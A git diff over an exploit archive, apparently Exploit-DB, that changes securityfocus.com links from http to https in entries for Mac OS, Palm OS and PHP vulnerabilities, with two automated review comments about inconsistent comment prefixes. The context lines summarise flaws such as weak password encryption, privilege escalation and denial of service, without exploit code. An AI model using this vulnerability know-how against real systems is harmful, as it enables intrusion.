@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/552/info +source: https://www.securityfocus.com/bid/552/info Autothenticate is an extension for MacOS that remembers usernames and passwords from visited websites, and atomatically enters them when the site is visited again. It can be configured to store the username and password, the username only, or nothing. It stores this information in encrypted form in a preference file called "AutothenticatePreferences" located in the Preferences folder in the System Folder. The encryption mechanism used is weak and can be broken. diff --git a/exploits/osx/local/19439.txt b/exploits/osx/local/19439.txt index 2efe8d3fa..81fa25496 100644 --- a/exploits/osx/local/19439.txt +++ b/exploits/osx/local/19439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/553/info +source: https://www.securityfocus.com/bid/553/info On Guard, a security program for MacOS, includes an emergency password feature in the event that the administrative password is lost or forgotten. If the user name 'emergency' is entered, On Guard will generate an Emergency Code. The user must then call Power On Software, and after registration validation is done, provide the Emergency Code. Power On Software will then provide an emergency password. However, the method used to generate this emergency password has been reverse engineered, and an exploit is publicly available that will automatically generate the emergency password with no phone call. diff --git a/exploits/osx/local/21070.txt b/exploits/osx/local/21070.txt index 629358274..c16227412 100644 --- a/exploits/osx/local/21070.txt +++ b/exploits/osx/local/21070.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3186/info +source: https://www.securityfocus.com/bid/3186/info A user who has set an Open Firmware password on their Apple system believes it to be safe when powered down. There is a tool that any user with access to the Finder can run in order to reveal the Open Firmware password without any decryption. diff --git a/exploits/osx/local/21076.txt b/exploits/osx/local/21076.txt index ea95cd454..c70f91d49 100644 --- a/exploits/osx/local/21076.txt +++ b/exploits/osx/local/21076.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3213/info +source: https://www.securityfocus.com/bid/3213/info Intego FileGuard is a commercial access control utility for Mac OS versions 7-9.1. It's functionality includes the ability to enforce privileges, log activities, manage user accounts, restrict access by time, etc. diff --git a/exploits/osx/local/21815.txt b/exploits/osx/local/21815.txt index 607678e54..79a2df740 100644 --- a/exploits/osx/local/21815.txt +++ b/exploits/osx/local/21815.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5768/info +source: https://www.securityfocus.com/bid/5768/info Mac OS X is the BSD-based operating system distributed and maintained by Apple. diff --git a/exploits/osx/local/24608.txt b/exploits/osx/local/24608.txt index f14c3cda3..aceb7aded 100644 --- a/exploits/osx/local/24608.txt +++ b/exploits/osx/local/24608.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11211/info +source: https://www.securityfocus.com/bid/11211/info It is reported that RsyncX is prone to a local privilege escalation vulnerability. diff --git a/exploits/osx/local/24609.txt b/exploits/osx/local/24609.txt index 7835e8151..20406c7ae 100644 --- a/exploits/osx/local/24609.txt +++ b/exploits/osx/local/24609.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11212/info +source: https://www.securityfocus.com/bid/11212/info RsyncX is reported to contain an insecure temporary file creation vulnerability. The result of this is that temporary files created by the application may use predictable filenames. diff --git a/exploits/osx/local/25055.c b/exploits/osx/local/25055.c index a1a7091cb..5868dc059 100644 --- a/exploits/osx/local/25055.c +++ b/exploits/osx/local/25055.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/12314/info +source: https://www.securityfocus.com/bid/12314/info Reportedly a local integer overflow vulnerability affects the Darwin Kernel. This issue is due to a failure of the affected to properly handle integer signedness. diff --git a/exploits/osx/local/25256.c b/exploits/osx/local/25256.c index c5788af88..d873d711d 100644 --- a/exploits/osx/local/25256.c +++ b/exploits/osx/local/25256.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12863/info +// source: https://www.securityfocus.com/bid/12863/info Multiple security vulnerabilities are reported to affect Apple Mac OS X. These issues were disclosed in the referenced vendor advisory. diff --git a/exploits/osx/local/26185.txt b/exploits/osx/local/26185.txt index 34099285d..bb9a8d42b 100644 --- a/exploits/osx/local/26185.txt +++ b/exploits/osx/local/26185.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14630/info +source: https://www.securityfocus.com/bid/14630/info A vulnerability in Apple Directory Services allows unprivileged users to create or delete directory services idnetity accounts. diff --git a/exploits/osx/local/28576.txt b/exploits/osx/local/28576.txt index e91883c59..0c1c898ec 100644 --- a/exploits/osx/local/28576.txt +++ b/exploits/osx/local/28576.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20031/info +source: https://www.securityfocus.com/bid/20031/info Apple Mac OS X 'kextload' is prone to a format-string vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/osx/local/29190.txt b/exploits/osx/local/29190.txt index 67e59a3e2..a28929531 100644 --- a/exploits/osx/local/29190.txt +++ b/exploits/osx/local/29190.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21291/info +source: https://www.securityfocus.com/bid/21291/info Apple Mac OS X is prone to a local integer-overflow vulnerability. This issue occurs when the operating system fails to handle specially crafted binaries. diff --git a/exploits/osx/local/29194.c b/exploits/osx/local/29194.c index e9c8122ca..5dcefac6a 100644 --- a/exploits/osx/local/29194.c +++ b/exploits/osx/local/29194.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21317/info +// source: https://www.securityfocus.com/bid/21317/info Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to an IOCTL call. diff --git a/exploits/osx/local/29201.c b/exploits/osx/local/29201.c index 858ed596c..e6f34b35f 100644 --- a/exploits/osx/local/29201.c +++ b/exploits/osx/local/29201.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/21349/info +source: https://www.securityfocus.com/bid/21349/info Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to a system call. diff --git a/exploits/osx/local/29950.js b/exploits/osx/local/29950.js index 82554a37b..c1faf0352 100644 --- a/exploits/osx/local/29950.js +++ b/exploits/osx/local/29950.js 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23825/info +source: https://www.securityfocus.com/bid/23825/info Apple Safari is prone to an unspecified local vulnerability. diff --git a/exploits/osx/local/30096.txt b/exploits/osx/local/30096.txt index 39beaebf5..f4a9a0f4a 100644 --- a/exploits/osx/local/30096.txt +++ b/exploits/osx/local/30096.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24208/info +source: https://www.securityfocus.com/bid/24208/info Apple Mac OS X's VPN service daemon is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. diff --git a/exploits/osx/local/31940.txt b/exploits/osx/local/31940.txt index a30a6ad20..aa679429e 100644 --- a/exploits/osx/local/31940.txt +++ b/exploits/osx/local/31940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29831/info +source: https://www.securityfocus.com/bid/29831/info Mac OS X is prone to a local privilege-escalation vulnerability affecting ARDAgent (Apple Remote Desktop). diff --git a/exploits/osx/local/35488.c b/exploits/osx/local/35488.c index aa96d026a..45b336681 100644 --- a/exploits/osx/local/35488.c +++ b/exploits/osx/local/35488.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46982/info +// source: https://www.securityfocus.com/bid/46982/info Apple Mac OS X is prone to a local information-disclosure vulnerability because of an integer-overflow error in the HFS subsystem. diff --git a/exploits/osx/local/36143.txt b/exploits/osx/local/36143.txt index cef7fad14..7154bdc40 100644 --- a/exploits/osx/local/36143.txt +++ b/exploits/osx/local/36143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49676/info +source: https://www.securityfocus.com/bid/49676/info Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities. 
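Review bot: the comment prefix is applied inconsistently across source files. exploits/osx/local/35488.c gets `// source:`, while exploits/osx/local/29950.js keeps a bare `source:` on line 1, as do the earlier script files (28135.pl, 32694.pl, 33235.rb, 36271.py, 19244.sh). Either give the scripts the matching prefix (`//` for .js, `#` for the others) in this change, or state in the commit message that only .c files are meant to be touched.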
diff --git a/exploits/osx/local/39147.c b/exploits/osx/local/39147.c index 0dfe6fa45..cee1a5394 100644 --- a/exploits/osx/local/39147.c +++ b/exploits/osx/local/39147.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67023/info +// source: https://www.securityfocus.com/bid/67023/info Apple Mac OS X is prone to a local security-bypass vulnerability. diff --git a/exploits/osx/local/4759.c b/exploits/osx/local/4759.c index 331ab85bb..2659ae1e4 100644 --- a/exploits/osx/local/4759.c +++ b/exploits/osx/local/4759.c @@ -8,7 +8,7 @@ * http://seclists.org/fulldisclosure/2007/Dec/0445.html * http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=633 * http://phrack.org/issues.html?issue=64&id=11#article - * BID: http://www.securityfocus.com/bid/26926 + * BID: https://www.securityfocus.com/bid/26926 * * * Notes: diff --git a/exploits/osx/remote/20911.txt b/exploits/osx/remote/20911.txt index 4e562a8b8..127f76d88 100644 --- a/exploits/osx/remote/20911.txt +++ b/exploits/osx/remote/20911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2852/info +source: https://www.securityfocus.com/bid/2852/info A vulnerability exists when Apache webserver is used with Mac OS X Client. diff --git a/exploits/osx/remote/20984.txt b/exploits/osx/remote/20984.txt index ddafcbc32..502c33075 100644 --- a/exploits/osx/remote/20984.txt +++ b/exploits/osx/remote/20984.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2953/info +source: https://www.securityfocus.com/bid/2953/info A vulnerability exists in all versions of Apple MacOS X. diff --git a/exploits/osx/remote/21238.txt b/exploits/osx/remote/21238.txt index ccf181585..9f10ff41e 100644 --- a/exploits/osx/remote/21238.txt +++ b/exploits/osx/remote/21238.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3935/info +source: https://www.securityfocus.com/bid/3935/info A vulnerability has been discovered in MacOS systems running Internet Explorer 5.1 and earlier. MacOS X is not affected by this issue. diff --git a/exploits/osx/remote/21596.txt b/exploits/osx/remote/21596.txt index 2f723fbce..cb2a26ae8 100644 --- a/exploits/osx/remote/21596.txt +++ b/exploits/osx/remote/21596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5176/info +source: https://www.securityfocus.com/bid/5176/info A vulnerability has been reported for MacOS X where an attacker may use SoftwareUpdate to install malicious software on the vulnerable system. SoftwareUpdate uses HTTP, without any authentication, to obtain updates from Apple. Any updated packages are installed on the system as the root user. diff --git a/exploits/osx/remote/22630.txt b/exploits/osx/remote/22630.txt index b671f85ad..a5eeb8aeb 100644 --- a/exploits/osx/remote/22630.txt +++ b/exploits/osx/remote/22630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7660/info +source: https://www.securityfocus.com/bid/7660/info MP3Broadcaster is shipped as part of Darwin Streaming Server software. diff --git a/exploits/osx/remote/23800.txt b/exploits/osx/remote/23800.txt index a1ca2fb0a..7ba0d029b 100644 --- a/exploits/osx/remote/23800.txt +++ b/exploits/osx/remote/23800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9841/info +source: https://www.securityfocus.com/bid/9841/info Multiple vendor Internet Browsers have been reported to be prone to a cookie path argument restriction bypass vulnerability. The issue presents itself due to a failure to properly sanitize encoded URI content, this may make it possible for an attacker to craft a URI that will contain encoded directory traversal sequences sufficient to provide access to a supposedly path exclusive cookie from an alternate path. 
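Review bot: in exploits/osx/local/4759.c (hunk `@@ -8,7 +8,7 @@`) only the `BID:` line moves to https; the seclists.org, labs.idefense.com and phrack.org references shown as context in the same comment block stay on http://. If the change is scoped to securityfocus.com links only, say so in the commit message; otherwise update the neighbouring references in the same pass so the block uses one scheme.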
diff --git a/exploits/osx/remote/24121.txt b/exploits/osx/remote/24121.txt index a9cece705..bdbb6d57f 100644 --- a/exploits/osx/remote/24121.txt +++ b/exploits/osx/remote/24121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10356/info +source: https://www.securityfocus.com/bid/10356/info It has been reported that Mac OS X may be prone to a vulnerability that could allow a remote attacker to execute arbitrary script code on a vulnerable system. diff --git a/exploits/osx/remote/24716.txt b/exploits/osx/remote/24716.txt index d288b7baa..f08381e71 100644 --- a/exploits/osx/remote/24716.txt +++ b/exploits/osx/remote/24716.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11573/info +source: https://www.securityfocus.com/bid/11573/info A URI obfuscation weakness reportedly affects the Apple Safari Web Browser. diff --git a/exploits/osx/remote/25598.txt b/exploits/osx/remote/25598.txt index e39fce0ab..33cdc2254 100644 --- a/exploits/osx/remote/25598.txt +++ b/exploits/osx/remote/25598.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13491/info +source: https://www.securityfocus.com/bid/13491/info Apple Mac OS X is prone to a directory-traversal vulnerability. Since the software fails to sufficiently sanitize input, a remote attacker could use the Bluetooth file- and object-exchange services to access files outside the default file-exchange directory. diff --git a/exploits/osx/remote/25626.c b/exploits/osx/remote/25626.c index dca340d1a..4d9c3aa96 100644 --- a/exploits/osx/remote/25626.c +++ b/exploits/osx/remote/25626.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13538/info +// source: https://www.securityfocus.com/bid/13538/info The Tomcat Plugin supplied with the HTTP server is reportedly prone to a remote buffer overflow vulnerability. diff --git a/exploits/osx/remote/26152.txt b/exploits/osx/remote/26152.txt index c28444887..70f41ca94 100644 --- a/exploits/osx/remote/26152.txt +++ b/exploits/osx/remote/26152.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14569/info +source: https://www.securityfocus.com/bid/14569/info Apple Mac OS X Weblog Server is prone to cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/osx/remote/28643.txt b/exploits/osx/remote/28643.txt index 512201dd9..5a79d34b9 100644 --- a/exploits/osx/remote/28643.txt +++ b/exploits/osx/remote/28643.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20144/info +source: https://www.securityfocus.com/bid/20144/info The Apple Mac OS X AirPort wireless driver is prone to multiple buffer-overflow vulnerabilities because it fails to perform sufficient bounds checking before copying data to finite-sized buffers. diff --git a/exploits/osx/remote/28710.txt b/exploits/osx/remote/28710.txt index 91e1c008b..ddc3ffd7a 100644 --- a/exploits/osx/remote/28710.txt +++ b/exploits/osx/remote/28710.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20218/info +source: https://www.securityfocus.com/bid/20218/info Skype is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before using it in the format-specification argument of a formatted-printing function. diff --git a/exploits/osx/remote/29448.txt b/exploits/osx/remote/29448.txt index 78a486d42..a7f8322f5 100644 --- a/exploits/osx/remote/29448.txt +++ b/exploits/osx/remote/29448.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22022/info +source: https://www.securityfocus.com/bid/22022/info Apple Mac OS X is prone to a remote integer-overflow vulnerability. This issue occurs when the UFS filesystem handler fails to handle specially crafted DMG images. diff --git a/exploits/osx/remote/29614.xml b/exploits/osx/remote/29614.xml index d8fbae1e6..b94b008d2 100644 --- a/exploits/osx/remote/29614.xml +++ b/exploits/osx/remote/29614.xml 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22597/info +source: https://www.securityfocus.com/bid/22597/info Parallels is prone to an arbitrary code-execution vulnerability because of a design flaw in the affected application. diff --git a/exploits/osx/remote/30228.txt b/exploits/osx/remote/30228.txt index adf0b714c..c19ea96df 100644 --- a/exploits/osx/remote/30228.txt +++ b/exploits/osx/remote/30228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24598/info +source: https://www.securityfocus.com/bid/24598/info Apple WebCore is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/osx/remote/30781.txt b/exploits/osx/remote/30781.txt index 4a5ca88af..d18efee68 100644 --- a/exploits/osx/remote/30781.txt +++ b/exploits/osx/remote/30781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26510/info +source: https://www.securityfocus.com/bid/26510/info Apple Mac OS X is prone to a vulnerability that can allow arbitrary code to run. This issue affects the Mail application when handling email attachments. @@ -11,7 +11,7 @@ NOTE: This vulnerability may be related to CVE-2007-0395 documented in BID 16907 UPDATE (November 21, 2007): Reports indicate that this issue occurs because of an error in the application's quarantine feature. We have not confirmed this information. UPDATE (December 17, 2007): This vulnerability stems from an unspecified implementation issue in the Launch Services application. -http://www.securityfocus.com/bid/16907 +https://www.securityfocus.com/bid/16907 /bin/ls -al echo diff --git a/exploits/osx/remote/31412.txt b/exploits/osx/remote/31412.txt index a658aa6b0..cb7f0b647 100644 --- a/exploits/osx/remote/31412.txt +++ b/exploits/osx/remote/31412.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28278/info +source: https://www.securityfocus.com/bid/28278/info Apple Mac OS X Server Wiki Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/osx/remote/31473.html b/exploits/osx/remote/31473.html index 3d4ffe009..cfe060de2 100644 --- a/exploits/osx/remote/31473.html +++ b/exploits/osx/remote/31473.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28405/info +source: https://www.securityfocus.com/bid/28405/info Apple Safari is prone to a content-spoofing vulnerability that allows attackers to populate a vulnerable Safari browser window with arbitrary malicious content. During such an attack, the URL and window title will display the intended site, while the body of the webpage is spoofed. diff --git a/exploits/osx/remote/31613.ics b/exploits/osx/remote/31613.ics index 303f1fb31..01106216c 100644 --- a/exploits/osx/remote/31613.ics +++ b/exploits/osx/remote/31613.ics @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28629/info +source: https://www.securityfocus.com/bid/28629/info Apple iCal is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. diff --git a/exploits/osx/remote/32048.html b/exploits/osx/remote/32048.html index 75b1cb854..853f475a2 100644 --- a/exploits/osx/remote/32048.html +++ b/exploits/osx/remote/32048.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30186/info +source: https://www.securityfocus.com/bid/30186/info Apple iPhone and iPod touch are prone to multiple remote vulnerabilities: diff --git a/exploits/osx/remote/33810.html b/exploits/osx/remote/33810.html index c4fdef03e..d8b2f41e7 100644 --- a/exploits/osx/remote/33810.html +++ b/exploits/osx/remote/33810.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38992/info +source: https://www.securityfocus.com/bid/38992/info Apple Safari on iPhone and iPod touch is prone to a remote code-execution vulnerability. diff --git a/exploits/osx/remote/33811.html b/exploits/osx/remote/33811.html index bad8c1ae8..92112b3bd 100644 --- a/exploits/osx/remote/33811.html +++ b/exploits/osx/remote/33811.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38994/info +source: https://www.securityfocus.com/bid/38994/info Apple Safari running on iPhone and iPod touch is prone to a remote code-execution vulnerability. diff --git a/exploits/osx/remote/35433.pl b/exploits/osx/remote/35433.pl index e40865ea1..81d32c35a 100755 --- a/exploits/osx/remote/35433.pl +++ b/exploits/osx/remote/35433.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46799/info +source: https://www.securityfocus.com/bid/46799/info Apple QuickTime is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/palm_os/dos/22602.c b/exploits/palm_os/dos/22602.c index 5b8126ba8..25105813b 100644 --- a/exploits/palm_os/dos/22602.c +++ b/exploits/palm_os/dos/22602.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7597/info +// source: https://www.securityfocus.com/bid/7597/info A problem with PalmOS may result in a denial of service. diff --git a/exploits/palm_os/local/20241.txt b/exploits/palm_os/local/20241.txt index 4ba0b2b76..16e0ddfed 100644 --- a/exploits/palm_os/local/20241.txt +++ b/exploits/palm_os/local/20241.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1715/info +source: https://www.securityfocus.com/bid/1715/info Palm OS is shipped with a security feature which enables a user to set password protection on various applications.The HotSync process allows a user to connect to a machine on the network through their Palm device. This process involves the device to send the encoded password to the HotSync Manager or HotSync Network Server on the network. The purpose of this transmission is to verify the password protection is still enabled when applications are being accessed from the network. diff --git a/exploits/palm_os/local/20505.txt b/exploits/palm_os/local/20505.txt index 596186408..750e1f794 100644 --- a/exploits/palm_os/local/20505.txt +++ b/exploits/palm_os/local/20505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2105/info +source: https://www.securityfocus.com/bid/2105/info Summary: diff --git a/exploits/palm_os/local/20746.c b/exploits/palm_os/local/20746.c index 3a41936df..4199df299 100644 --- a/exploits/palm_os/local/20746.c +++ b/exploits/palm_os/local/20746.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2567/info +// source: https://www.securityfocus.com/bid/2567/info Strip is a password generation utility made freely available by Zetetic Enterprises. Strip is a PalmOS based application designed to generate and store important passwords. diff --git a/exploits/palm_os/webapps/28659.txt b/exploits/palm_os/webapps/28659.txt index de1778470..a552367a7 100644 --- a/exploits/palm_os/webapps/28659.txt +++ b/exploits/palm_os/webapps/28659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20162/info +source: https://www.securityfocus.com/bid/20162/info Jamroom is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/perl/webapps/37117.txt b/exploits/perl/webapps/37117.txt index 9c1f812de..a569444ac 100644 
--- a/exploits/perl/webapps/37117.txt +++ b/exploits/perl/webapps/37117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53287/info +source: https://www.securityfocus.com/bid/53287/info Croogo CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/perl/webapps/37126.txt b/exploits/perl/webapps/37126.txt index d17359daf..20a439a76 100644 --- a/exploits/perl/webapps/37126.txt +++ b/exploits/perl/webapps/37126.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53306/info +source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: diff --git a/exploits/php/dos/21428.txt b/exploits/php/dos/21428.txt index d4e8fbec4..c091c0528 100644 --- a/exploits/php/dos/21428.txt +++ b/exploits/php/dos/21428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4635/info +source: https://www.securityfocus.com/bid/4635/info Messagerie is a web message board application maintained by La Basse. diff --git a/exploits/php/dos/22110.txt b/exploits/php/dos/22110.txt index 7b275a55b..19d13607e 100644 --- a/exploits/php/dos/22110.txt +++ b/exploits/php/dos/22110.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6465/info +source: https://www.securityfocus.com/bid/6465/info A denial of service vulnerability has been reported for the modules.php script used by PHP-Nuke. The vulnerability occurs because the modules.php script does not properly validate some URI parameters. diff --git a/exploits/php/dos/22419.php b/exploits/php/dos/22419.php index d8a8d2243..e96fee7f2 100644 --- a/exploits/php/dos/22419.php +++ b/exploits/php/dos/22419.php 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7187/info +source: https://www.securityfocus.com/bid/7187/info A vulnerability has been reported in PHP versions 4.3.1 and earlier. The problem occurs in the socket_iovec_alloc() and may allow an attacker to corrupt memory. Specifically, the affected function fails to carry out sanity checks on user-supplied argument values, making it prone to an integer overflow. diff --git a/exploits/php/dos/22425.php b/exploits/php/dos/22425.php index cc00a5cf5..c6a6a3af8 100644 --- a/exploits/php/dos/22425.php +++ b/exploits/php/dos/22425.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7197/info +source: https://www.securityfocus.com/bid/7197/info A vulnerability has been reported in PHP versions 4.3.1 and earlier. The problem occurs in the socket_recv() and may allow an attacker to corrupt memory. Specifically, the affected function fails to carry out sanity checks on user-supplied argument values, making it prone to an integer overflow. diff --git a/exploits/php/dos/22426.php b/exploits/php/dos/22426.php index 1b1507c2c..c157b7dee 100644 --- a/exploits/php/dos/22426.php +++ b/exploits/php/dos/22426.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7198/info +source: https://www.securityfocus.com/bid/7198/info A vulnerability has been reported in PHP versions 4.3.1 and earlier. The problem occurs in the socket_recvfrom() and may allow an attacker to corrupt memory. Specifically, the affected function fails to carry out sanity checks on user-supplied argument values, making it prone to an integer overflow. diff --git a/exploits/php/dos/22435.php b/exploits/php/dos/22435.php index e300c1fd0..45914ee3c 100644 --- a/exploits/php/dos/22435.php +++ b/exploits/php/dos/22435.php 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7210/info +source: https://www.securityfocus.com/bid/7210/info A buffer overflow has been reported in the PHP openlog() function. By passing an argument of excessive size to the function, it may be possible for an attacker to overwrite memory, resulting in a denial of service. It is also possible for an attacker to execute arbitrary code in the PHP interpreter. diff --git a/exploits/php/dos/22494.txt b/exploits/php/dos/22494.txt index d9fb79303..204d9c796 100644 --- a/exploits/php/dos/22494.txt +++ b/exploits/php/dos/22494.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7351/info +source: https://www.securityfocus.com/bid/7351/info It has been reported that an attacker may trigger a denial of service condition in osCommerce application. If malicious URI parameters are passed to several of the osCommerce PHP pages, the mySQL and web server hosting osCommerce reportedly becomes unstable, possibly resulting in a denial of service condition. diff --git a/exploits/php/dos/22660.txt b/exploits/php/dos/22660.txt index 938b88aa6..a65044498 100644 --- a/exploits/php/dos/22660.txt +++ b/exploits/php/dos/22660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7702/info +source: https://www.securityfocus.com/bid/7702/info some submissions to the rating system. Because of this, a remote attacker may be able to submit a string that causes a denial of service to legitmate users. diff --git a/exploits/php/dos/23311.txt b/exploits/php/dos/23311.txt index bd4f67797..26592cb04 100644 --- a/exploits/php/dos/23311.txt +++ b/exploits/php/dos/23311.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8930/info +source: https://www.securityfocus.com/bid/8930/info It has been reported that E107 may be prone to a denial of service vulnerability. The issue has been reported to exist due to improper handling of user-supplied data in the form of HTML or script code to the 'Name:' field of Chatbox.php script. This issue may cause the software to behave in an unstable manner leading to a crash. diff --git a/exploits/php/dos/23460.pl b/exploits/php/dos/23460.pl index 566927b24..0df7b456e 100755 --- a/exploits/php/dos/23460.pl +++ b/exploits/php/dos/23460.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9271/info +source: https://www.securityfocus.com/bid/9271/info It has been reported that ProjectForum may be prone to a denial of service vulnerability that may allow an attacker to cause the server to crash by sending an excessively long string via the 'find' request to the server. diff --git a/exploits/php/dos/23750.txt b/exploits/php/dos/23750.txt index 80ed37714..7296dec7f 100644 --- a/exploits/php/dos/23750.txt +++ b/exploits/php/dos/23750.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9732/info +source: https://www.securityfocus.com/bid/9732/info It has been reported that Opt-X may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'systempath' variable in the header.php module. diff --git a/exploits/php/dos/24621.txt b/exploits/php/dos/24621.txt index b605a16f4..40a994655 100644 --- a/exploits/php/dos/24621.txt +++ b/exploits/php/dos/24621.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11232/info +source: https://www.securityfocus.com/bid/11232/info The Pinnacle Systems ShowCenter web-based interface is reported prone to a remote denial of service vulnerability. 
diff --git a/exploits/php/dos/24854.txt b/exploits/php/dos/24854.txt index 91974a425..b87fb55f2 100644 --- a/exploits/php/dos/24854.txt +++ b/exploits/php/dos/24854.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11964/info +source: https://www.securityfocus.com/bid/11964/info PHP4 and PHP5 are reported prone to multiple local and remote vulnerabilities that may lead to code execution within the context of the vulnerable process. The following specific issues are reported: diff --git a/exploits/php/dos/24855.txt b/exploits/php/dos/24855.txt index a0adcdaa5..9676aadaf 100644 --- a/exploits/php/dos/24855.txt +++ b/exploits/php/dos/24855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11964/info +source: https://www.securityfocus.com/bid/11964/info PHP4 and PHP5 are reported prone to multiple local and remote vulnerabilities that may lead to code execution within the context of the vulnerable process. The following specific issues are reported: diff --git a/exploits/php/dos/25752.txt b/exploits/php/dos/25752.txt index 211c5bc7d..5cfab6253 100644 --- a/exploits/php/dos/25752.txt +++ b/exploits/php/dos/25752.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13805/info +source: https://www.securityfocus.com/bid/13805/info PHPMailer is affected by a remote denial-of-service vulnerability. diff --git a/exploits/php/dos/29577.php b/exploits/php/dos/29577.php index eb3478c42..372e195f1 100644 --- a/exploits/php/dos/29577.php +++ b/exploits/php/dos/29577.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22505/info +source: https://www.securityfocus.com/bid/22505/info PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/dos/29692.txt b/exploits/php/dos/29692.txt index f4a16b076..8cd067f12 100644 --- a/exploits/php/dos/29692.txt +++ b/exploits/php/dos/29692.txt 
